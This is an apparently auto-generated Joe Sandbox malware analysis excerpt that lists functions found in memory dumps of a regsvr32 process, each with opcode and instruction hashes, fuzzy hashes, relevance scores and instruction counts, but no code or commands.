Opcode ID: 37423c9d46a7c914545311d6de0227cd52b085ee836e5e2d8b0d06f668941822
Instruction ID: 89a289bbd877ae7fe0012bf136da0b22fc6124ebf23e055f6cc20374f272fa84
Opcode Fuzzy Hash: 37423c9d46a7c914545311d6de0227cd52b085ee836e5e2d8b0d06f668941822
Instruction Fuzzy Hash: 4522177261162286DB244E3DC8516B772E2AFD5350B29C72FE85DCB395FA3DCC428349

Uniqueness

Uniqueness Score: -1.00%

Function 0047D980, Relevance: .6, Instructions: 612COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9b80bc0ef750c546063ff099eaab4663a469d234785f02f077b4f6bdfd9e77d
Instruction ID: c9e082c08d259243417fcaaa0b13cdf0c4e9ae7a7ff7d1abfc6ec7acd194fe46
Opcode Fuzzy Hash: c9b80bc0ef750c546063ff099eaab4663a469d234785f02f077b4f6bdfd9e77d
Instruction Fuzzy Hash: DD22F871A146128BD7248F2AC8406ABB3F2BFD4740F19C66EE85D8B354EB79DC41C399

Uniqueness

Uniqueness Score: -1.00%

Function 0048FA10, Relevance: .6, Instructions: 569COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fbc1ab91b1238bf95ee59e2e8e25ece752056646b3a369061082b380778b056
Instruction ID: beefcbb5e341cbe91687022308b158044d6af60a3e8f6f74c72534605c04f10b
Opcode Fuzzy Hash: 4fbc1ab91b1238bf95ee59e2e8e25ece752056646b3a369061082b380778b056
Instruction Fuzzy Hash: 4C12C1356043419FD728DF19C880B6BB7E1AFC4714F18892EEA8997355E778EC88C785

Uniqueness

Uniqueness Score: -1.00%

Function 0047BF50, Relevance: .5, Instructions: 542COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5d19c950d3206712b1004c452d88e64ae12569de0aad1d6093721ce458abcaa
Instruction ID: 5f637390f013a0d1a0302ba0f6547015bc5a8013b9ebd844e8e59e5322c83e32
Opcode Fuzzy Hash: e5d19c950d3206712b1004c452d88e64ae12569de0aad1d6093721ce458abcaa
Instruction Fuzzy Hash: 9112C471A043128BC7248F69C8D06AA73E2FFD5710B18C62EEC998B395EB39DC45C795

Uniqueness

Uniqueness Score: -1.00%

Function 0046CA10, Relevance: .5, Instructions: 479COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dadf6844ec3758e03c6f7083a9cc0081a3faab2b917400b9af9415339571736d
Instruction ID: 44d781ffb44f2b642f239770e8c3b2493f2ed935040c993a469bf39e6b7ff8b9
Opcode Fuzzy Hash: dadf6844ec3758e03c6f7083a9cc0081a3faab2b917400b9af9415339571736d
Instruction Fuzzy Hash: 8EF1B1716046009BC754BF2AC89263F76E6AFC4758F18092FF556973A1FA38DC05CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 0046F9A0, Relevance: .5, Instructions: 473COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d660f56c1f9ece7688e948068c834f38dca591276ed273b3e8a330a8d68dc6fd
Instruction ID: 5d8366007f61d8f71cda688499e85bc2921b9c2517da0c42cbc2853f4753806d
Opcode Fuzzy Hash: d660f56c1f9ece7688e948068c834f38dca591276ed273b3e8a330a8d68dc6fd
Instruction Fuzzy Hash: 4CF1A2716046049BC704BF66D85267E73A5AF85318F094E3FF49A97292FB38DC09C74A

Uniqueness

Uniqueness Score: -1.00%

Function 0048D620, Relevance: .4, Instructions: 432COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74ae0b925d7d92fdd6495f69d5d0e516fea43d2078a8b171d5423a64d326f7cc
Instruction ID: b231a86008c896632d2d868f6988a1be6a5f5f9cda59e6e3d25cba335b58d2f1
Opcode Fuzzy Hash: 74ae0b925d7d92fdd6495f69d5d0e516fea43d2078a8b171d5423a64d326f7cc
Instruction Fuzzy Hash: D5E1052EE39FD919E313953EA403377B7044FF72C8F02D727B49431992DB6956926248

Uniqueness

Uniqueness Score: -1.00%

Function 0047F6E0, Relevance: .4, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4b42faca3ca424f46c927473a69feaae28222aa6c37a6f7a2c78f5daa755833
Instruction ID: fb96ffb23b82a10dfb50e101ac3d20a18dfe8cc53942b3d65cd2fda9825a493a
Opcode Fuzzy Hash: a4b42faca3ca424f46c927473a69feaae28222aa6c37a6f7a2c78f5daa755833
Instruction Fuzzy Hash: 45C14D71A0071286C7285F29C4506B772E2EFD4750B29C73FD99D8B394FB39CC4A924A

Uniqueness

Uniqueness Score: -1.00%

Function 00477FC0, Relevance: .4, Instructions: 351COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f61ebe9e8cbaa3200c9dacce0d43bb52dd950b082ddfb78a9de9225987a4258
Instruction ID: 2b513ae405c812ed557d00361683632900e5235a722ce5e2c7bed02c15074f4f
Opcode Fuzzy Hash: 4f61ebe9e8cbaa3200c9dacce0d43bb52dd950b082ddfb78a9de9225987a4258
Instruction Fuzzy Hash: E2B1EE71945B9257D7258A2D88443BBBAD2AFC2300F1DC66FDC9D1B396DE398C01C396

Uniqueness

Uniqueness Score: -1.00%

Function 004783C0, Relevance: .3, Instructions: 343COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8b876869e6e1399d07086898aa747f3fd665ccaa3c4c619e8c8968fd6a9a47e
Instruction ID: 2c2e723d5e5a7884f208ce31123fc86f57052136a78af238c4ec6b9fdb16f4a3
Opcode Fuzzy Hash: b8b876869e6e1399d07086898aa747f3fd665ccaa3c4c619e8c8968fd6a9a47e
Instruction Fuzzy Hash: 41B168B5A4031296DB284E29C8957BB72D1BF81350F29C62FED5E97385EF788C008289

Uniqueness

Uniqueness Score: -1.00%

Function 0047E3F0, Relevance: .3, Instructions: 317COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57480cebb6c073643066db0bb37664f53f528b12d2ca4e8ceeab76096e5db0d9
Instruction ID: 7ffda01c23adcedcc7539e787221d17485ec17a81956f9c880c5e3acbf6ecaf7
Opcode Fuzzy Hash: 57480cebb6c073643066db0bb37664f53f528b12d2ca4e8ceeab76096e5db0d9
Instruction Fuzzy Hash: 4CC1D2746043028BD718CF2AC4906ABB7E1FF98304F14C76EE9998B361E739D856CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0048D180, Relevance: .3, Instructions: 307COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c4affb0b97e9a92ad5c319a7318a59f7f89af0f3b98c73a12dbfb66936e14af
Instruction ID: f4270097c8db3e6a6023857b13347dc6027cf3cac7df662bd613c0e3f4a13ec6
Opcode Fuzzy Hash: 2c4affb0b97e9a92ad5c319a7318a59f7f89af0f3b98c73a12dbfb66936e14af
Instruction Fuzzy Hash: F0D1B03150D3E48AC325BB2A94907BFFFD15FE6304F1C8C7EA8C552282D5788A45DBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00483B00, Relevance: .3, Instructions: 307COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 769dd45fdfd1994aa2fcb50dbb8a97899a61763fb7daf8420eb3df3334b3789f
Instruction ID: f5f04a443332357f203fe8e59b83ff5f2ddf92466c7e7adc34eb289d7f6f97bb
Opcode Fuzzy Hash: 769dd45fdfd1994aa2fcb50dbb8a97899a61763fb7daf8420eb3df3334b3789f
Instruction Fuzzy Hash: BCC1C1756087428BC724DF29C44072FBBE1AFC5B01F188E1EE8959B351D739EA45CB86

Uniqueness

Uniqueness Score: -1.00%

Function 004767C8, Relevance: .3, Instructions: 304COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e68211865d629611bba974b52a040ff57319dd9ad1a9425a75036dd7cc7d055
Instruction ID: 00053b0fd8079d1a9d00b36247bb19f557645e853642f73a87baea2200e887e4
Opcode Fuzzy Hash: 8e68211865d629611bba974b52a040ff57319dd9ad1a9425a75036dd7cc7d055
Instruction Fuzzy Hash: D2C19D706047458BD724EF55D4907AB77E2FB91308F16C42FC88D9B342EB789846CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0048DCA0, Relevance: .3, Instructions: 297COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19572c1b798058c94cd4207bb43ad0dad04bb55abc297bd6c07a84037ab5eab7
Instruction ID: 42f0f8d7ddc977534d6637d1165d6e86f2d33217762ba4ee32b056ba0ca0416e
Opcode Fuzzy Hash: 19572c1b798058c94cd4207bb43ad0dad04bb55abc297bd6c07a84037ab5eab7
Instruction Fuzzy Hash: C3C1C62160D3A14AC315BB3A94902BFFFD15FE6204F188C7EE4D947283D578C984D7A6

Uniqueness

Uniqueness Score: -1.00%

Function 00489B10, Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b3f2147b2cc6a45cacde8172b76a812e1dc6d3a0f11a4114b2f5da289a2e1a0
Instruction ID: 20d1b330be8bd4e4998b90d6fb1210904c308b192df8b89d4c80001b20459a45
Opcode Fuzzy Hash: 2b3f2147b2cc6a45cacde8172b76a812e1dc6d3a0f11a4114b2f5da289a2e1a0
Instruction Fuzzy Hash: 04A1F471A04B069BD704AF19CC8066EF7E2FFC4304F18CA2EE86847745E779AD518B89

Uniqueness

Uniqueness Score: -1.00%

Function 00477564, Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 314d3a121ba2e0d1830933db7578196bafdba7213d8b969f5ad5b3b268c4e890
Instruction ID: d59f2b2ca4b461b1856e80917fbc65d837f1446754006fea00abc6fab7321a76
Opcode Fuzzy Hash: 314d3a121ba2e0d1830933db7578196bafdba7213d8b969f5ad5b3b268c4e890
Instruction Fuzzy Hash: 21A1E170A086058BD7249F1DD5846EBB3A2FB94314FA9C97FD44C8B315EB789C41CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 004871F0, Relevance: .3, Instructions: 277COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d429c3ac184809212723adcbd6e746b65124195a74a52075ee5fe463380fc44
Instruction ID: 6fba2601d6262e106f58f536679123ca3ae6bef568d8cdb579c711ebcf98a396
Opcode Fuzzy Hash: 2d429c3ac184809212723adcbd6e746b65124195a74a52075ee5fe463380fc44
Instruction Fuzzy Hash: 21B1ADB050C3428BD715DF29C46072EBBE1BFC5340F288A6EE89987351E739D946CB86

Uniqueness

Uniqueness Score: -1.00%

Function 0047E0A0, Relevance: .3, Instructions: 273COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74a8e911a4f29a8feecf1261f1edd226c0157e3f3747d79cfe280e31a92c4aa2
Instruction ID: b929abbcb48e31e7e672b5293a65283a335afbe82d7dc041421f2e63c0613aae
Opcode Fuzzy Hash: 74a8e911a4f29a8feecf1261f1edd226c0157e3f3747d79cfe280e31a92c4aa2
Instruction Fuzzy Hash: 99A1C0B19047128BC324CF2AC54165BB7E2FFC8700F18CAAEE8999B355E738DD058796

Uniqueness

Uniqueness Score: -1.00%

Function 0047FDD0, Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c31f9b7cdb9490313d3b63a32406192f5372d33359b2d824e6fbf98519c66a29
Instruction ID: 089416a6c96cf9bf0496ddb8671e242f204819b198ce50d0bb29fa59fa9ad717
Opcode Fuzzy Hash: c31f9b7cdb9490313d3b63a32406192f5372d33359b2d824e6fbf98519c66a29
Instruction Fuzzy Hash: A081E3716147018BD714CF29C44066BB3E2BFD9354F29C62FE4989B3A1EB39D849C78A

Uniqueness

Uniqueness Score: -1.00%

Function 00480220, Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2db77dfe83392df997fdca982a5963f1cf45e072480f6015c9e3b136aec9b8fb
Instruction ID: 13300a7cb10e5422b21fe592bf6a6470345253ee34a2020dfdfb274bfb9e5b61
Opcode Fuzzy Hash: 2db77dfe83392df997fdca982a5963f1cf45e072480f6015c9e3b136aec9b8fb
Instruction Fuzzy Hash: 1A714A3162071287D7686E29C45113F72D2AFD17507298B2EEDA6873A0FB78CC59C349

Uniqueness

Uniqueness Score: -1.00%

Function 00485CB0, Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aff05f55cec81c8cbb89bb9310e4807102455aae407b6acccf268787ed05e4ff
Instruction ID: b77fb7e84c7c042bd01757ffe3beae00c9302cac17c8722b37eb430e817a0b1d
Opcode Fuzzy Hash: aff05f55cec81c8cbb89bb9310e4807102455aae407b6acccf268787ed05e4ff
Instruction Fuzzy Hash: 6681D470608B418BD718EF29C48032FB7D2BFD5314F18CA6EE9968B351D7389945CB86

Uniqueness

Uniqueness Score: -1.00%

Function 004798DA, Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7357bc719a5f8a0238a45c1f77690d5ed0b164abf6199a0695743211be5b7034
Instruction ID: 89b7e0b056bcdd61d4518cf313ae1d431196429d81836a83c6e2fbb25d3c3103
Opcode Fuzzy Hash: 7357bc719a5f8a0238a45c1f77690d5ed0b164abf6199a0695743211be5b7034
Instruction Fuzzy Hash: F4613EB1A0176186DB248E29C8516B772E6AFC1740B1CC22FDD5E5B398FB3DCC418359

Uniqueness

Uniqueness Score: -1.00%

Function 0047A0D0, Relevance: .2, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72a2b18218923bf33894fb5388b3e17f43bda03b1264e169f2468f23ea404246
Instruction ID: c1e2cf89c9cd7d7114018ff1b9d0545cd0b7441c39105a86590ddef4947b4cf3
Opcode Fuzzy Hash: 72a2b18218923bf33894fb5388b3e17f43bda03b1264e169f2468f23ea404246
Instruction Fuzzy Hash: 9161487290131187D7244F18C491AAF73A0EFC1750B5AC3AEDD5E5B392EB3A9C61C29B

Uniqueness

Uniqueness Score: -1.00%

Function 00479E70, Relevance: .2, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d781025913a76f35b518d42bb9011f93251b6c056899b775aa9060b1c0e66a9
Instruction ID: e13d5fdcfa9653f027d560f69a491accf55b1358c238e89135cb41135df2a38f
Opcode Fuzzy Hash: 0d781025913a76f35b518d42bb9011f93251b6c056899b775aa9060b1c0e66a9
Instruction Fuzzy Hash: E361587290031287C7248F19C491AABB3A1BF85350B1AC32FED5D9B390EB399C51C3DA

Uniqueness

Uniqueness Score: -1.00%

Function 00481020, Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae64409f2d16467f71373ee2bf306acfd33e073002edd05b5c76f8db5368782a
Instruction ID: f2a5873c536923d71244d009588577be8333faff64f40b5850d34574e5935680
Opcode Fuzzy Hash: ae64409f2d16467f71373ee2bf306acfd33e073002edd05b5c76f8db5368782a
Instruction Fuzzy Hash: 3C613D2060439157D7219E698CC075F7BAA6F96300F1CC6AFCD554B366DA3A8C43C386

Uniqueness

Uniqueness Score: -1.00%

Function 00481240, Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 099fc12331ff022561492b18087020d9d8d5b8bf08d513a05c8e731bfd20c05d
Instruction ID: 806be2ebceeb4ceb46fc95ed4046f8a15069a6446f8be39db637262b420f83dc
Opcode Fuzzy Hash: 099fc12331ff022561492b18087020d9d8d5b8bf08d513a05c8e731bfd20c05d
Instruction Fuzzy Hash: 80614E7160879147D721AA6984C072F7BAA6F92700F1CC6AFCC554B3A6D679CC43C3C5

Uniqueness

Uniqueness Score: -1.00%

Function 00478CC0, Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d139eb4d573b3b3d1014b080c0fd1ab8e66937a0c43eb19ae496f21c9fb69d1
Instruction ID: 71a93eb76fe369f0a4fed783c66df44e4b2952c97ca1087b0d1b62dca70adc74
Opcode Fuzzy Hash: 3d139eb4d573b3b3d1014b080c0fd1ab8e66937a0c43eb19ae496f21c9fb69d1
Instruction Fuzzy Hash: AE512871A4071286D7344F2AC8896B772A2BFE0750B29C23ED95DC7395FF798841C289

Uniqueness

Uniqueness Score: -1.00%

Function 00478AB0, Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10a3c9910ea41fd533c8730267ed1528ca8aaa2e9f90d5bc588d437e70140cb2
Instruction ID: e99f97039564ed19342c76fb050f8cd59c6164d2a919e6d9d5c681f5a209a073
Opcode Fuzzy Hash: 10a3c9910ea41fd533c8730267ed1528ca8aaa2e9f90d5bc588d437e70140cb2
Instruction Fuzzy Hash: C9515BF1A817124AD7284F29C8856B77292FFD0350B28C23FE95D47355FF7D98018269

Uniqueness

Uniqueness Score: -1.00%

Function 004788C0, Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0462b3abe644d686df3d15cf7fea5482de025a1b1b951e707ee8700216b69174
Instruction ID: dd851b41883e6fbdd6fccf94601261d54b5a004eb974cbf658a5728bf1261d59
Opcode Fuzzy Hash: 0462b3abe644d686df3d15cf7fea5482de025a1b1b951e707ee8700216b69174
Instruction Fuzzy Hash: 5D515BF1A4071246D7284E2AC8556B772E2BFD1310B2DC23FDA9E87395FF398811C25A

Uniqueness

Uniqueness Score: -1.00%

Function 0048CEF8, Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcbcf9705e709eb844b646129b4b55cf383a25db1a3ec8ef676bcb8762ebb863
Instruction ID: a2ff6831d28ec3c044ddc28438f662a3e554e54c37f6f84ec2e684b8b6337fdf
Opcode Fuzzy Hash: fcbcf9705e709eb844b646129b4b55cf383a25db1a3ec8ef676bcb8762ebb863
Instruction Fuzzy Hash: 41419E71A0511555EF25BE2A88C07BF27829F62758F148827FF04C93C4E63ECC82D3A9

Uniqueness

Uniqueness Score: -1.00%

Function 004796D0, Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b175748cf7301ee0c6ed0bf10d9d1cc7f3f0d81bd195dc22fade8a8467494fda
Instruction ID: d9a3956b80f371f03b14915cc1fc7eae4d5e6a25842b0970c4ddb0f50a5e53e7
Opcode Fuzzy Hash: b175748cf7301ee0c6ed0bf10d9d1cc7f3f0d81bd195dc22fade8a8467494fda
Instruction Fuzzy Hash: C2412C7252422183C7285F2DC8915A7B395AF95360F16C33FEC6E873D1EB398C51C29A

Uniqueness

Uniqueness Score: -1.00%

Function 00472980, Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a35200f3ffac21fa4275e3aa349c6e65a6739067eaa41158c9d14f408022889
Instruction ID: b8d3fb81c38a3355291065c27a4f505266cce19f2b65d4f8be6100a89e1ed77f
Opcode Fuzzy Hash: 4a35200f3ffac21fa4275e3aa349c6e65a6739067eaa41158c9d14f408022889
Instruction Fuzzy Hash: 9A41DF306442049BC714FF25CD55BEA33A4EF90704F54C42EB9095B292EFA8A805C69E

Uniqueness

Uniqueness Score: -1.00%

Function 001FB5D0, Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2382019410.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1c0000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6575b7d41f7eae239cd673b109fcdab93d1d6451e83fe4a0aeefb69e302c0eb1
Instruction ID: 07bec1981e4d5fee3568de8cf47add676a530971c57bb2fb54201f9a6c06922b
Opcode Fuzzy Hash: 6575b7d41f7eae239cd673b109fcdab93d1d6451e83fe4a0aeefb69e302c0eb1
Instruction Fuzzy Hash: 2A310AB0A0810ECBCB58CF85C1D4ABEB7B2BF44325F648199D906AB390D3759E81DB61

Uniqueness

Uniqueness Score: -1.00%

Function 001FB6D0, Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2382019410.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1c0000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b42eeaf083fbd2ff8aff7e5200a30b42e2d1e1024dde0e63d92a7892f32080c
Instruction ID: ee94ec1841e7442ec9be18f969f05fcfec3118dc770ee46c5be74d88229c6ece
Opcode Fuzzy Hash: 5b42eeaf083fbd2ff8aff7e5200a30b42e2d1e1024dde0e63d92a7892f32080c
Instruction Fuzzy Hash: 93119978A0820CEFCB48DF54C0D0AADBBB1FB88311F2185A9D94997780D735EE81CB50

Uniqueness

Uniqueness Score: -1.00%

Function 001D88DD, Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2382019410.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1c0000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dae8bae5d266d933eed9766570152b5a2e541bf3027ad2889f23a334d90eea72
Instruction ID: 8712beec20244201dbcd23920a1098167dbc0fba8c218e82c482a835464dee30
Opcode Fuzzy Hash: dae8bae5d266d933eed9766570152b5a2e541bf3027ad2889f23a334d90eea72
Instruction Fuzzy Hash: 2F017BB2408BE58FC702AF34C80459A3B21AE832307590399E5B01F3E6CB219807CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0048BE30, Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76f6433e3c74a3447e8eaa2ba15ee16424b61191432471d824bdce721637ee07
Instruction ID: 90018ea581132d21e0fa014ed120e2c1fd619b3290680f003d7254e04f4b242f
Opcode Fuzzy Hash: 76f6433e3c74a3447e8eaa2ba15ee16424b61191432471d824bdce721637ee07
Instruction Fuzzy Hash: 47F05E34204503AEEB257E6A8C80BBF22D8DF46394F184D67BA55D5294FB29C804E79A

Uniqueness

